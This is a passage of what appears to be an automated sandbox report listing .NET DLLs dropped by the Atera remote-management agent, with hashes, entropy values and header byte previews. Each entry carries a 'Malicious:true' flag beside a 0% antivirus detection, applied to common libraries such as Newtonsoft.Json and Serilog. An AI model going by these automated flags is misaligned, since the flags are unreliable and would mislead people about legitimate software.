                                                                                                                                                                                                                                                                                                                                  SHA-512:7FE5D1397E87CC171CA17F5CB5CAD4A521C95C7DCB6520D4F606C72169E8CCDC0A3407AD3215C383EFBFDD292E974C22E0FE86364456F9FB6ADB672FA69C9BE5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H..........." ..0.............Z.... ........... ....................................`.....................................O.......(...............P(..............T............................................ ............... ..H............text...`.... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B................9.......H.......\?...d...........................................................('...*^.('......W...%...}....*:.('.....}....*:.('.....}....*:.('.....}....*:.('.....}....**.-..(....*..s(...z.~....*...0..........(....,..*..(.....o)......&...*...................0...........(.......(*...-..,..*.*.(....,.r...p......%...%...(+...*..(,...*.(....,.r...p......%...%...%...(+...*...(-...*.(....,!r...p......%...%...%...%...(+...*....(....*..,&(....,..r...pr...p.(+...(/...*..(0...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):24144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.626943067066813
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:oy1x30dJaeTP8pBT7xe3SUDtzWzK0Ws0Nyb8E9VF6IYijSJIVx61mx4uq:oq/eTeABdW0EpYi60a24D
                                                                                                                                                                                                                                                                                                                                  MD5:E60A5961148A4A258DA7E5636B13513C
                                                                                                                                                                                                                                                                                                                                  SHA1:AF8C56176AB5E9389A24831607BB22109F4E0668
                                                                                                                                                                                                                                                                                                                                  SHA-256:F022F19DF5137AB3D331020A91EF82F14338C14D4B13E35EE454B1DF8E378F4E
                                                                                                                                                                                                                                                                                                                                  SHA-512:69FEF8119FFE10B755D98F3443F2CF4AFC794E7F4AF8E435661705217AE83E08D97DAD78CE8357365E80075E4F8BD906F5637E2F4AA951E650D094E22826CC99
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D3..........." ..0..,..........FK... ...`....... ...............................K....`..................................J..O....`...............6..P(...........I..T............................................ ............... ..H............text...L+... ...,.................. ..`.rsrc........`......................@..@.reloc...............4..............@..B................%K......H.......0$.. %..................PI........................................(....*^.(.......*...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z:.(......}....*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*:.(......}....*..{....*..{....*"..}....*...~....%-.&~..........s....%.....(...+*..r...p(.....o.....o......(...+&.*.0..P.......s ......}!.....}"....r...p(.....{!...r...p(........#...s$...o...+&.o....(...+&.*

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):61520
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.347831442138035
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:ng+uGuV+1mb5JtoNIHQs1YyH67beAn9eLfLaV7CvS4fEpYi60k5:ng+uGuV+1mbaqvy9OfLKMS4Y76T
                                                                                                                                                                                                                                                                                                                                  MD5:A8E354B9EEA0EF24846A0B9C2682E854
                                                                                                                                                                                                                                                                                                                                  SHA1:2589334FAF38ABEDF4B4CBEF78A13E8307579719
                                                                                                                                                                                                                                                                                                                                  SHA-256:D1AEDE76866EDB2DF8DC16377EB227D7CDF9DBE38A4A03E2889B4DB578BC2FB6
                                                                                                                                                                                                                                                                                                                                  SHA-512:651C27E2620AF873407FD99DEEF1A7690D7A7775A00D234FB6704220048CEA4744F7F6A8B440B76242C97CF9329ED64DAAB49F25D4168F9A8895A54AD7D4E0DF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....%..........." ..0.................. ........... ....................... ......q=....`.....................................O.......H...............P(..............T............................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B........................H........F.....................0.........................................('...*^.('......G...%...}....*:.('.....}....*:.('.....}....*:.('.....}....*:.('.....}....**.-..(....*..s(...z.~....*...0..........(....,..*..(.....o)......&...*...................0...........(.......(*...-..,..*.*.(....,.r...p......%...%...(+...*..(,...*.(....,.r...p......%...%...%...(+...*...(-...*.(....,!r...p......%...%...%...%...(+...*....(....*..,&(....,..r...pr...p.(+...(/...*..(0...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):42576
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.3707327440867765
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zKsIwjxNp8hpwVeEfHuX1QUIh3kOP7oIyWb3jec/uiCR9Crw3EpYi602HFl:7d8hMfHuXbIkOP7ym3jZ/uiCRgrJ76F
                                                                                                                                                                                                                                                                                                                                  MD5:889E12B6DC6BE1AABEDDE6581315E05F
                                                                                                                                                                                                                                                                                                                                  SHA1:755CE2AF85FC8C1D2C9C78ACD3A5277006E4BE1C
                                                                                                                                                                                                                                                                                                                                  SHA-256:5E71AE5154C370E286F9150293501AC7AA6493C4C5E0CDFD2FDB79952A6E2C51
                                                                                                                                                                                                                                                                                                                                  SHA-512:C697394B69AD9B22E8B6CA2DE2A3754BAD7F758FE1BA13330BDA5E2A8AD499767C2FD2915D8DF712B2E0222C786101A701A63DBF743F26F4BF44A595436AE685
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U.:..........." ..0..r............... ........... ....................................`................................./...O.......l............~..P(..........8...T............................................ ............... ..H............text....q... ...r.................. ..`.rsrc...l............t..............@..@.reloc...............|..............@..B................c.......H........:...O............................................................(-...*^.(-......G...%...}....*:.(-.....}....*:.(-.....}....*:.(-.....}....*:.(-.....}....*.~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(/...-..,..*.*.(....,.r...p......%...%...(0...*..(1...*.(....,.r...p......%...%...%...(0...*...(2...*.(....,!r...p......%...%...%...%...(0...*....(3...*..,&(....,..r...pr...p.(0...(4...*..(5...*.*.(....,.r...p......%...%...(0..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):345168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.141579347154777
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Lpc1zjTFIfqAnI7FZVllnuJxKrSj8r2yQQLeBLPHGUdlWOAlMoBJR1TaKwQz8wej:WpTCqAn+fnw5h9hdls+IZTWcu
                                                                                                                                                                                                                                                                                                                                  MD5:4C5C7F17107F973D1748B9AFCBAA6264
                                                                                                                                                                                                                                                                                                                                  SHA1:634828376808308B9C3ABBF3F9F23F004C6D3EA7
                                                                                                                                                                                                                                                                                                                                  SHA-256:CEF6856455C837A0D4A12EC74E2CDAFF2AAF58431ECFFFE81D521BA1F9105982
                                                                                                                                                                                                                                                                                                                                  SHA-512:439674BD7DDF725A4713F2D52BFAD85266E6E516BE4C68BB8A1715E56D9260FBD0716F73A40E7BB5CBA6F250F8FE63900D89AA636AE9E103A33261F0C30C320B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z............." ..0..............0... ...@....... ...............................h....`.................................S0..O....@..................P(...`......D/..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H...........xZ..........|...H.............................................{....*..{....*V.(......}......}....*...0..A........u2.......4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ..<. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q5....5...-.&.+...5...o.....%..{.......%q6....6...-.&.+...6...o.....(....*..{....*..{....*..{....*r.(......}......}......}....*..0..Y........u7.......L.,G(.....{.....{....o....,/(.....{.....{....o....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.954235606372974
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:HFIM0KteTMN4Or4D3OdmZg5WHEaEDIGBBjgrIQtD+tVqDM:lzMTMNNd+g5Wk78GBBjgrIQtD
                                                                                                                                                                                                                                                                                                                                  MD5:10A43CC4F317030814FDE96CEB87F904
                                                                                                                                                                                                                                                                                                                                  SHA1:68FBA8D4CDD1226D79880EC3EE8AC5B2C0D6F2A5
                                                                                                                                                                                                                                                                                                                                  SHA-256:4B277CBC3D41BB821592E162C6CCCCB228976B4BBDD7E287658EC5CC70C1E17A
                                                                                                                                                                                                                                                                                                                                  SHA-512:9C6E8E5FEEEA07FDC10C23B81591A2607CCD99A70CAE29C6D0D3DA0321ADE25A39E39F7CD6486D02D23EDCE18F6F6728FE1FC9F18410A28C27587B6FF1EBA5B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)..........." ..0.............>.... ........... ....................... ......6.....`.....................................O.......................P(..............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............9............................................................(....*^.(...........%...}....*:.(......}....*:.(......}....*.(.........*....}.....(......{.....X.....}....*....0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..o....aX...X...o....2.....cY.....cY....cY..{......{...._..+&.{|..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):285776
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.198273359426846
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:LMiAQB4wmESyxV8pj06e4isQ8gsHsjb/W1DBZ7DhsNcOo:LMZpj06vUsMjbQ77D+Q
                                                                                                                                                                                                                                                                                                                                  MD5:57F49C46D06D307B0993573DFFA1AFAD
                                                                                                                                                                                                                                                                                                                                  SHA1:846051569DCB228225DB120EE73B809B78EAC4DA
                                                                                                                                                                                                                                                                                                                                  SHA-256:10A31774B9390F3A5FBEA8E7986D5C0962144C797595C38B0A143AF8D2047775
                                                                                                                                                                                                                                                                                                                                  SHA-512:D39D9888A9D0B19981B4269CB065471BE2FE6772C8E59B3311A716D65BDCE303F5E51317A79876FB59BB71D40DD1ED4C9FA3ECADBE9CD7E9AB58FCFB675A2833
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..*...........H... ...`....... ...............................4....`..................................H..O....`..L............4..P(...........G..T............................................ ............... ..H............text....(... ...*.................. ..`.rsrc...L....`.......,..............@..@.reloc...............2..............@..B.................H......H.......Xd......................TG......................................^.{....,.(G...z..}.....*^.{....,.(G...z..}.....*"..(L...*"..(M...*...0..,.......s.......}............s9...sv....{.....(....*.0..-.......s.......}............s9....s.....{.....(....*....0..(.......s.......}............s9.....{.....(....*.0..'.......s.......}............s9...sv.....(....*B...s......(....*......(....*.0..'.......s.......}............s9...sv.....(....*F...s.......(....*....0..X.........(:...}

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Hosting.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):38992
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.293461755167425
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:/dfuvOXFXW/8O6bXD+eeIgLPRsnHnyhQupytM9z7O3zfXYvj8rbPH5nTLhCPsIdC:/xuJRRsnHnyhQupytM9z7O3zfXYvj8r1
                                                                                                                                                                                                                                                                                                                                  MD5:C8D82C0479C6AFFD9C03CEB554C57070
                                                                                                                                                                                                                                                                                                                                  SHA1:DD028B9E93A9FBCD92B6E576C102ABC05B5B696B
                                                                                                                                                                                                                                                                                                                                  SHA-256:DF23AFBDC67DAC8E555B958AC3282C7A5ED407EC6B3B9504ABC1357DA3C706E5
                                                                                                                                                                                                                                                                                                                                  SHA-512:4D00CF4BA79515B6CFAD5E649DCE4FC9362CD2ACAAEBA8027D0C391D1D52BB29B4AEFF402A285393D89D46B4A042744C99437B797940BF9D44D20117E29A648E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..f..........Z.... ........... ..............................Z.....`.....................................O....................p..P(.............T............................................ ............... ..H............text...`e... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B................;.......H.......tF...=..................t.......................................2.o....s9...*6..s4...o....*..0..>.......sg......}......}......}.....-.r...ps....z....h...s....o....&.*...0..C.......sk......}.....-.r...ps....z.{....-.r...ps....z....l...s......(....*..0..{.......sm......}......}!.....}"....-.r...ps....z.{!...-.r...ps....z.(....u....} .....{ ...,..{"......+..}........n...s....o....&.*..0..U.......st......}(....-.r1..ps....z....u...s....(...+&.~....%-.&~......f...s....%...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.552967250210858
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:nSgpZUlMxR5I1z8w3Uta2lQBVMxzMJktYm+9HWXCYhNyb8E9VF6IYijSJIVxKtKf:nSCZUl2O1zCnXyzDeEpYi60kO
                                                                                                                                                                                                                                                                                                                                  MD5:4648AB15C70B48652E75E9C464D1159F
                                                                                                                                                                                                                                                                                                                                  SHA1:2E2CA96BE435DAC3C27D3AFF52DB179797DF9AA3
                                                                                                                                                                                                                                                                                                                                  SHA-256:94C52D1166E65629234F1C9AADDBF8952A10575162CD62B7737B6C4F3BB83F25
                                                                                                                                                                                                                                                                                                                                  SHA-512:5A4943927C5B5073A4E04AF33319DB0DD80F57F196E56FD1AB9327D73608896A6D32927C30643C82DC09A08D2C3BF4A762FCC57C128E9BB4AD23E4F151354DD7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....m..........." ..0..:..........vX... ...`....... ...............................q....`................................."X..O....`..h............D..P(...........W..T............................................ ............... ..H............text...|8... ...:.................. ..`.rsrc...h....`.......<..............@..@.reloc...............B..............@..B................VX......H.......H...H(...................V........................................(....*..(....*..-.r...ps....z.-.r...ps....z..s......o....*v.-.r1..ps....z...s....o.....*...0..V.......s.......}.....-.rA..ps....z.,..o......./...s....(...+&+...{.....s....(....&...(...+&.*...0...........-.rQ..ps....z.o.... ....1..{.....o....*.{.....o....t......,..*.{.....o......{..........(.....{....o.... ....3..{....o ....{......o!......,..(".....*.........U.4.........s#...}.....s$...}.....s%...}.....(

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):41552
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.319256406884913
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:0UqoXsEgfFHoiikZ9y3BHdD+XR/tGo06BCEpYi60tz:7LrgfPw3mXREaD76o
                                                                                                                                                                                                                                                                                                                                  MD5:4AF3070366532017700A74665137415C
                                                                                                                                                                                                                                                                                                                                  SHA1:16C9B507CBE0AA26C53FC062C701E8BBA0A3AC48
                                                                                                                                                                                                                                                                                                                                  SHA-256:2078F46C4B45CB45BBA47CDD4FC62B8694AB86FAAB07615D940599F572C1F01B
                                                                                                                                                                                                                                                                                                                                  SHA-512:17D9F2A80BBBD5C28088B78F15DF20C14563813A4E6ACF87C6BE7EF7B409A6A2B689146E4482AD07365AF94EF29EC7F1E571218BFD0CB26B513B855A888BB5F6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z..........." ..0..p............... ........... ..............................u.....`....................................O....................z..P(.............T............................................ ............... ..H............text...$n... ...p.................. ..`.rsrc................r..............@..@.reloc...............x..............@..B........................H........<...O..................X.........................................(....*^.(.......D...%...}....*:.(......}....*:.(......}....*...0..,.............................................(....*.0..*...........................................(....*...0..(.........................................(....*.0..&.......................................(....*...0..S........-.r...ps....z.-.r%..ps....z.-.r/..ps....z...s ..............................(....*..0..V........-.r...ps....z.-.rM.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138320
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.159600096602975
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:EobKO7RaoWuUeZk/f0Sh1HlWZm1ZZTdyGFkNUMT+P65jDt4NR:hbKKz1UeZk/Phv8lDuPaa
                                                                                                                                                                                                                                                                                                                                  MD5:E62F3260722E28821A1E88C7B0E80D7D
                                                                                                                                                                                                                                                                                                                                  SHA1:B41AF2B3EE10FEEE430B1D1E77378A74845B2B7C
                                                                                                                                                                                                                                                                                                                                  SHA-256:9B194B0D1D6A77559BECCCD5E282DDEE0B639295472C4C5B54D29CFDA5A7CDC4
                                                                                                                                                                                                                                                                                                                                  SHA-512:3F090C8B20B93F87CE0BB27054B2508601CD4FC4F04E024AD50B22DBDA5030BC7973EE064291644286F361CED7A64FEA80AFC67683C0D0BB53B25DEF9E6D6DDD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....\..........." ..0.............6.... ... ....... .......................`.......Y....`.....................................O.... ..................P(...@..........T............................................ ............... ..H............text...<.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......h...0O............................................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. ... )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0..b........r...p......%..{)......%q.........-.&.+.......o2....%..{*......%q.........-.&.+.......o2....(3...*..{4...*..{5...*V.(+.....}4.....}5...*.0..;........u......,/(,....{4....{4...o-...,.(.....{5....{5...o/...*.*. .T.2 )UU.Z(,....{4...o0

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):150096
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.237638392383951
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:K0B07tjJYVNSCn+tn3nUMI000000I+49U2BL1krTPG:B07iSqSnkMDjy2
                                                                                                                                                                                                                                                                                                                                  MD5:CE874526DC410A3FB6FDAAE411460BC8
                                                                                                                                                                                                                                                                                                                                  SHA1:6A5465493B1183706F03CC2C4444BCB332061694
                                                                                                                                                                                                                                                                                                                                  SHA-256:1B6C1BA4764B563445870520F492B2890FC58B45A138D33D4248716759A0A8B3
                                                                                                                                                                                                                                                                                                                                  SHA-512:7792408A85C416B2ACD4C3AFD4128819DCF82E620E361FCC0EA1BF62917FE5F8212B2222CC134E4A467C11136E73AF4DE09F1D7E9B2475559FB0EF4E5D56219E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#9..........."!..0..............4... ........@.. ..............................,{....`..................................4..W....@..............."..P(...`.......3..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................4......H...........lV............................................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*.0..K........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(..... ...._.S...(......d.S*..0..&.........+....(....G...Z.(......X....(....2.*...0..L.........(..........(.....Z.(......(.....s....~....%-.&~..........s....%.....(...+*...0Y..5...0Y*..aY.5...aY..X* ....*V..0Y..6...aY......*.*.s.........*..(....*....0..&...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):52816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.177649028870548
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3tgEqel7clEfRWOuDXaVIWb0TadZjirgFDrGfmAXOaYbMlHEpYi60gZ:3iprEfsOuD0hhji6DrLbAg763Z
                                                                                                                                                                                                                                                                                                                                  MD5:A5EB9A8815D5A2CBAA49402D5D6CB44F
                                                                                                                                                                                                                                                                                                                                  SHA1:794060597244213FBC7A4A70C2E3BACBB97E9688
